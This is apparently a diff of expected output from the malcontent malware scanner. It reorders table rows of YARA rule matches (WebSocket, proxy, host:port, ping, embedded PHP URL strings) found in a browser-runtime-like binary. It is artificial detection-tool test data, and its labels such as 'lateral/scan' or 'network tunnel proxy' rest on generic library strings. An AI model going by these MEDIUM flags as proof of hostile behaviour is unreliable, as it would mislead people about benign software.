[DeleteFileError](https://github.com/search?q=DeleteFileError&type=code) | | MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utimes](https://github.com/search?q=utimes&type=code) | | MEDIUM | [fs/path/etc_hosts](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc-hosts.yara#etc_hosts) | references /etc/hosts | [/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | | MEDIUM | [fs/path/root](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/root.yara#root_path_val) | path reference within /root | [/root/root.js](https://github.com/search?q=%2Froot%2Froot.js&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/__v8_gc__](https://github.com/search?q=%2Ftmp%2F__v8_gc__&type=code)
[/tmp/node-repl-sock](https://github.com/search?q=%2Ftmp%2Fnode-repl-sock&type=code)
[/tmp/perfetto-consumer](https://github.com/search?q=%2Ftmp%2Fperfetto-consumer&type=code)
[/tmp/perfetto-producer](https://github.com/search?q=%2Ftmp%2Fperfetto-producer&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/perfetto-consumer](https://github.com/search?q=%2Ftmp%2Fperfetto-consumer&type=code)
[/tmp/perfetto-producer](https://github.com/search?q=%2Ftmp%2Fperfetto-producer&type=code)
[/tmp/node-repl-sock](https://github.com/search?q=%2Ftmp%2Fnode-repl-sock&type=code)
[/tmp/__v8_gc__](https://github.com/search?q=%2Ftmp%2F__v8_gc__&type=code) | | MEDIUM | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#Chown) | Changes file ownership | [Chown](https://github.com/search?q=Chown&type=code) | | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [Chmod](https://github.com/search?q=Chmod&type=code)
[chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/$](https://github.com/search?q=%2Fproc%2F%24&type=code)
[/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code)
[/proc/$](https://github.com/search?q=%2Fproc%2F%24&type=code) | | MEDIUM | [fs/proc/cpuinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/cpuinfo.yara#proc_cpuinfo) | get CPU info | [/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code) | | MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) | | MEDIUM | [fs/proc/self_cgroup](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-cgroup.yara#pid_self_cgroup) | accesses /proc files within own cgroup | [/proc/self/cgroup/sys/fs/cgroupcgroup](https://github.com/search?q=%2Fproc%2Fself%2Fcgroup%2Fsys%2Ffs%2Fcgroupcgroup&type=code) | @@ -68,50 +68,50 @@ | MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) | | MEDIUM | [malware/ref](https://github.com/chainguard-dev/malcontent/blob/main/rules/malware/ref.yara#malware) | mentions 'malware' | [_malware](https://github.com/search?q=_malware&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | -| MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | +| MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code)
[DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | -| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [Accept](https://github.com/search?q=Accept&type=code)
[application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code) | +| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | | MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | -| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[post](https://github.com/search?q=post&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type header.](https://github.com/search?q=Content-Type+header.&type=code)
[Content-Type too large](https://github.com/search?q=Content-Type+too+large&type=code)
[Content-Type was not one of](https://github.com/search?q=Content-Type+was+not+one+of&type=code)
[Content-Type: application/json](https://github.com/search?q=Content-Type%3A+application%2Fjson&type=code)
[Content-Type: application/octet](https://github.com/search?q=Content-Type%3A+application%2Foctet&type=code)
[Content-Type: multipart/related](https://github.com/search?q=Content-Type%3A+multipart%2Frelated&type=code)
[Content-Type: text/html](https://github.com/search?q=Content-Type%3A+text%2Fhtml&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[AcceptWebSocket](https://github.com/search?q=AcceptWebSocket&type=code)
[DOMWebSocket](https://github.com/search?q=DOMWebSocket&type=code)
[EnclaveWebSocketClient](https://github.com/search?q=EnclaveWebSocketClient&type=code)
[OnWebSocketMessage](https://github.com/search?q=OnWebSocketMessage&type=code)
[OnWebSocketRequest](https://github.com/search?q=OnWebSocketRequest&type=code)
[ServerSupportsWebSocket](https://github.com/search?q=ServerSupportsWebSocket&type=code)
[WebSocket::Close](https://github.com/search?q=WebSocket%3A%3AClose&type=code)
[WebSocket::Connect](https://github.com/search?q=WebSocket%3A%3AConnect&type=code)
[WebSocket::Create](https://github.com/search?q=WebSocket%3A%3ACreate&type=code)
[WebSocket::GetBufferedAmount](https://github.com/search?q=WebSocket%3A%3AGetBufferedAmount&type=code)
[WebSocket::GetCloseCode](https://github.com/search?q=WebSocket%3A%3AGetCloseCode&type=code)
[WebSocket::GetCloseReason](https://github.com/search?q=WebSocket%3A%3AGetCloseReason&type=code)
[WebSocket::GetCloseWasClean](https://github.com/search?q=WebSocket%3A%3AGetCloseWasClean&type=code)
[WebSocket::GetExtensions](https://github.com/search?q=WebSocket%3A%3AGetExtensions&type=code)
[WebSocket::GetProtocol](https://github.com/search?q=WebSocket%3A%3AGetProtocol&type=code)
[WebSocket::GetReadyState](https://github.com/search?q=WebSocket%3A%3AGetReadyState&type=code)
[WebSocket::GetURL](https://github.com/search?q=WebSocket%3A%3AGetURL&type=code)
[WebSocket::IsWebSocket](https://github.com/search?q=WebSocket%3A%3AIsWebSocket&type=code)
[WebSocket::ReceiveMessage](https://github.com/search?q=WebSocket%3A%3AReceiveMessage&type=code)
[WebSocket::SendMessage](https://github.com/search?q=WebSocket%3A%3ASendMessage&type=code)
[WebSocketAdapter](https://github.com/search?q=WebSocketAdapter&type=code)
[WebSocketAuthenticationHandler](https://github.com/search?q=WebSocketAuthenticationHandler&type=code)
[WebSocketChannelImpl](https://github.com/search?q=WebSocketChannelImpl&type=code)
[WebSocketCloseInfo](https://github.com/search?q=WebSocketCloseInfo&type=code)
[WebSocketConnector](https://github.com/search?q=WebSocketConnector&type=code)
[WebSocketCreate](https://github.com/search?q=WebSocketCreate&type=code)
[WebSocketDestroy](https://github.com/search?q=WebSocketDestroy&type=code)
[WebSocketError](https://github.com/search?q=WebSocketError&type=code)
[WebSocketHTTPURL](https://github.com/search?q=WebSocketHTTPURL&type=code)
[WebSocketHandshakeClient](https://github.com/search?q=WebSocketHandshakeClient&type=code)
[WebSocketInit](https://github.com/search?q=WebSocketInit&type=code)
[WebSocketMessageChunkAccumulator::Segment](https://github.com/search?q=WebSocketMessageChunkAccumulator%3A%3ASegment&type=code)
[WebSocketReceiveHandshakeResponse](https://github.com/search?q=WebSocketReceiveHandshakeResponse&type=code)
[WebSocketSendData](https://github.com/search?q=WebSocketSendData&type=code)
[WebSocketSendHandshakeRequest](https://github.com/search?q=WebSocketSendHandshakeRequest&type=code)
[WebSocketSticky](https://github.com/search?q=WebSocketSticky&type=code)
[WebSocketStream::Delegate::OnAuthRequired](https://github.com/search?q=WebSocketStream%3A%3ADelegate%3A%3AOnAuthRequired&type=code)
[WebSocketStreamOptions](https://github.com/search?q=WebSocketStreamOptions&type=code)
[WebSockets](https://github.com/search?q=WebSockets&type=code)
[establishWebSocketConnection](https://github.com/search?q=establishWebSocketConnection&type=code)
[kWebSocketURL:](https://github.com/search?q=kWebSocketURL%3A&type=code)
[testWebSocketPort](https://github.com/search?q=testWebSocketPort&type=code)
[webSocketClosed](https://github.com/search?q=webSocketClosed&type=code)
[webSocketCreated](https://github.com/search?q=webSocketCreated&type=code)
[webSocketDebuggerUrl](https://github.com/search?q=webSocketDebuggerUrl&type=code)
[webSocketFrameError](https://github.com/search?q=webSocketFrameError&type=code)
[webSocketFrameReceived](https://github.com/search?q=webSocketFrameReceived&type=code)
[webSocketFrameSent](https://github.com/search?q=webSocketFrameSent&type=code)
[webSocketHandshakeResponseReceived](https://github.com/search?q=webSocketHandshakeResponseReceived&type=code)
[webSocketProtocol](https://github.com/search?q=webSocketProtocol&type=code)
[webSocketWillSendHandshakeRequest](https://github.com/search?q=webSocketWillSendHandshakeRequest&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | $host_port
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host, protocol, port](https://github.com/search?q=host%2C+protocol%2C+port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host: address, port](https://github.com/search?q=host%3A+address%2C+port&type=code)
[host:]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[hostname && A.port](https://github.com/search?q=hostname+%26%26+A.port&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[hostname}${port](https://github.com/search?q=hostname%7D%24%7Bport&type=code)
[hostname}:${port](https://github.com/search?q=hostname%7D%3A%24%7Bport&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code) | -| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping err](https://github.com/search?q=ping++err&type=code)
[ping cancelled](https://github.com/search?q=ping+cancelled&type=code)
[ping connectivity probe](https://github.com/search?q=ping+connectivity+probe&type=code)
[ping failures and](https://github.com/search?q=ping+failures+and&type=code)
[ping from zygote child](https://github.com/search?q=ping+from+zygote+child&type=code)
[ping interval to](https://github.com/search?q=ping+interval+to&type=code)
[ping interval.](https://github.com/search?q=ping+interval.&type=code)
[ping last_ping_sent_:](https://github.com/search?q=ping+last_ping_sent_%3A&type=code)
[ping libuv](https://github.com/search?q=ping+libuv&type=code)
[ping most likely connection to](https://github.com/search?q=ping+most+likely+connection+to&type=code)
[ping payload must be 8 bytes](https://github.com/search?q=ping+payload+must+be+8+bytes&type=code)
[ping received](https://github.com/search?q=ping+received&type=code)
[ping response](https://github.com/search?q=ping+response&type=code)
[ping was sent and the ack](https://github.com/search?q=ping+was+sent+and+the+ack&type=code)
[ping with high retransmit count:](https://github.com/search?q=ping+with+high+retransmit+count%3A&type=code) | +| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type: application/octet](https://github.com/search?q=Content-Type%3A+application%2Foctet&type=code)
[Content-Type: multipart/related](https://github.com/search?q=Content-Type%3A+multipart%2Frelated&type=code)
[Content-Type: application/json](https://github.com/search?q=Content-Type%3A+application%2Fjson&type=code)
[Content-Type was not one of](https://github.com/search?q=Content-Type+was+not+one+of&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Type: text/html](https://github.com/search?q=Content-Type%3A+text%2Fhtml&type=code)
[Content-Type too large](https://github.com/search?q=Content-Type+too+large&type=code)
[Content-Type header.](https://github.com/search?q=Content-Type+header.&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocketMessageChunkAccumulator::Segment](https://github.com/search?q=WebSocketMessageChunkAccumulator%3A%3ASegment&type=code)
[WebSocketStream::Delegate::OnAuthRequired](https://github.com/search?q=WebSocketStream%3A%3ADelegate%3A%3AOnAuthRequired&type=code)
[258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[webSocketHandshakeResponseReceived](https://github.com/search?q=webSocketHandshakeResponseReceived&type=code)
[WebSocketReceiveHandshakeResponse](https://github.com/search?q=WebSocketReceiveHandshakeResponse&type=code)
[webSocketWillSendHandshakeRequest](https://github.com/search?q=webSocketWillSendHandshakeRequest&type=code)
[WebSocketAuthenticationHandler](https://github.com/search?q=WebSocketAuthenticationHandler&type=code)
[WebSocketSendHandshakeRequest](https://github.com/search?q=WebSocketSendHandshakeRequest&type=code)
[WebSocket::GetBufferedAmount](https://github.com/search?q=WebSocket%3A%3AGetBufferedAmount&type=code)
[establishWebSocketConnection](https://github.com/search?q=establishWebSocketConnection&type=code)
[WebSocket::GetCloseWasClean](https://github.com/search?q=WebSocket%3A%3AGetCloseWasClean&type=code)
[WebSocket::GetCloseReason](https://github.com/search?q=WebSocket%3A%3AGetCloseReason&type=code)
[WebSocket::ReceiveMessage](https://github.com/search?q=WebSocket%3A%3AReceiveMessage&type=code)
[WebSocket::GetExtensions](https://github.com/search?q=WebSocket%3A%3AGetExtensions&type=code)
[WebSocket::GetReadyState](https://github.com/search?q=WebSocket%3A%3AGetReadyState&type=code)
[WebSocketHandshakeClient](https://github.com/search?q=WebSocketHandshakeClient&type=code)
[ServerSupportsWebSocket](https://github.com/search?q=ServerSupportsWebSocket&type=code)
[WebSocket::GetCloseCode](https://github.com/search?q=WebSocket%3A%3AGetCloseCode&type=code)
[EnclaveWebSocketClient](https://github.com/search?q=EnclaveWebSocketClient&type=code)
[WebSocket::GetProtocol](https://github.com/search?q=WebSocket%3A%3AGetProtocol&type=code)
[WebSocket::IsWebSocket](https://github.com/search?q=WebSocket%3A%3AIsWebSocket&type=code)
[WebSocket::SendMessage](https://github.com/search?q=WebSocket%3A%3ASendMessage&type=code)
[WebSocketStreamOptions](https://github.com/search?q=WebSocketStreamOptions&type=code)
[webSocketFrameReceived](https://github.com/search?q=webSocketFrameReceived&type=code)
[WebSocketChannelImpl](https://github.com/search?q=WebSocketChannelImpl&type=code)
[webSocketDebuggerUrl](https://github.com/search?q=webSocketDebuggerUrl&type=code)
[webSocketFrameError](https://github.com/search?q=webSocketFrameError&type=code)
[OnWebSocketMessage](https://github.com/search?q=OnWebSocketMessage&type=code)
[OnWebSocketRequest](https://github.com/search?q=OnWebSocketRequest&type=code)
[WebSocket::Connect](https://github.com/search?q=WebSocket%3A%3AConnect&type=code)
[WebSocketCloseInfo](https://github.com/search?q=WebSocketCloseInfo&type=code)
[WebSocketConnector](https://github.com/search?q=WebSocketConnector&type=code)
[webSocketFrameSent](https://github.com/search?q=webSocketFrameSent&type=code)
[WebSocket::Create](https://github.com/search?q=WebSocket%3A%3ACreate&type=code)
[WebSocket::GetURL](https://github.com/search?q=WebSocket%3A%3AGetURL&type=code)
[WebSocketSendData](https://github.com/search?q=WebSocketSendData&type=code)
[testWebSocketPort](https://github.com/search?q=testWebSocketPort&type=code)
[webSocketProtocol](https://github.com/search?q=webSocketProtocol&type=code)
[WebSocket::Close](https://github.com/search?q=WebSocket%3A%3AClose&type=code)
[WebSocketAdapter](https://github.com/search?q=WebSocketAdapter&type=code)
[WebSocketDestroy](https://github.com/search?q=WebSocketDestroy&type=code)
[WebSocketHTTPURL](https://github.com/search?q=WebSocketHTTPURL&type=code)
[webSocketCreated](https://github.com/search?q=webSocketCreated&type=code)
[AcceptWebSocket](https://github.com/search?q=AcceptWebSocket&type=code)
[WebSocketCreate](https://github.com/search?q=WebSocketCreate&type=code)
[WebSocketSticky](https://github.com/search?q=WebSocketSticky&type=code)
[webSocketClosed](https://github.com/search?q=webSocketClosed&type=code)
[WebSocketError](https://github.com/search?q=WebSocketError&type=code)
[kWebSocketURL:](https://github.com/search?q=kWebSocketURL%3A&type=code)
[WebSocketInit](https://github.com/search?q=WebSocketInit&type=code)
[DOMWebSocket](https://github.com/search?q=DOMWebSocket&type=code)
[WebSockets](https://github.com/search?q=WebSockets&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [host, protocol, port](https://github.com/search?q=host%2C+protocol%2C+port&type=code)
[hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host: address, port](https://github.com/search?q=host%3A+address%2C+port&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[hostname && A.port](https://github.com/search?q=hostname+%26%26+A.port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[hostname}:${port](https://github.com/search?q=hostname%7D%3A%24%7Bport&type=code)
[hostname}${port](https://github.com/search?q=hostname%7D%24%7Bport&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host:]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code)
[host_port](https://github.com/search?q=host_port&type=code) | +| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping with high retransmit count:](https://github.com/search?q=ping+with+high+retransmit+count%3A&type=code)
[ping most likely connection to](https://github.com/search?q=ping+most+likely+connection+to&type=code)
[ping payload must be 8 bytes](https://github.com/search?q=ping+payload+must+be+8+bytes&type=code)
[ping was sent and the ack](https://github.com/search?q=ping+was+sent+and+the+ack&type=code)
[ping connectivity probe](https://github.com/search?q=ping+connectivity+probe&type=code)
[ping from zygote child](https://github.com/search?q=ping+from+zygote+child&type=code)
[ping last_ping_sent_:](https://github.com/search?q=ping+last_ping_sent_%3A&type=code)
[ping failures and](https://github.com/search?q=ping+failures+and&type=code)
[ping interval to](https://github.com/search?q=ping+interval+to&type=code)
[ping cancelled](https://github.com/search?q=ping+cancelled&type=code)
[ping interval.](https://github.com/search?q=ping+interval.&type=code)
[ping received](https://github.com/search?q=ping+received&type=code)
[ping response](https://github.com/search?q=ping+response&type=code)
[ping libuv](https://github.com/search?q=ping+libuv&type=code)
[ping err](https://github.com/search?q=ping++err&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/spoof](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/spoof.yara#spoof) | references spoofing | [of hostname spoofing](https://github.com/search?q=of+hostname+spoofing&type=code)
[protocol spoofing](https://github.com/search?q=protocol+spoofing&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/proxy/socks5](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/socks5.yara#socks5) | Supports SOCK5 proxies | [CONNECT %s](https://github.com/search?q=CONNECT+%25s&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[Tunnel](https://github.com/search?q=Tunnel&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[Tunnel](https://github.com/search?q=Tunnel&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code)
[Proxy](https://github.com/search?q=Proxy&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[proxy](https://github.com/search?q=proxy&type=code) | | MEDIUM | [net/rpc/ntlm](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/rpc/ntlm.yara#windows_ntlm_auth) | supports Windows NTLM authentication | [NTLM](https://github.com/search?q=NTLM&type=code)
[ntlm](https://github.com/search?q=ntlm&type=code) | | MEDIUM | [net/socket/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-connect.yara#_connect) | [initiate a connection on a socket](https://linux.die.net/man/3/connect) | [_connect](https://github.com/search?q=_connect&type=code) | | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Supports SSH (secure shell) | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code) | +| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
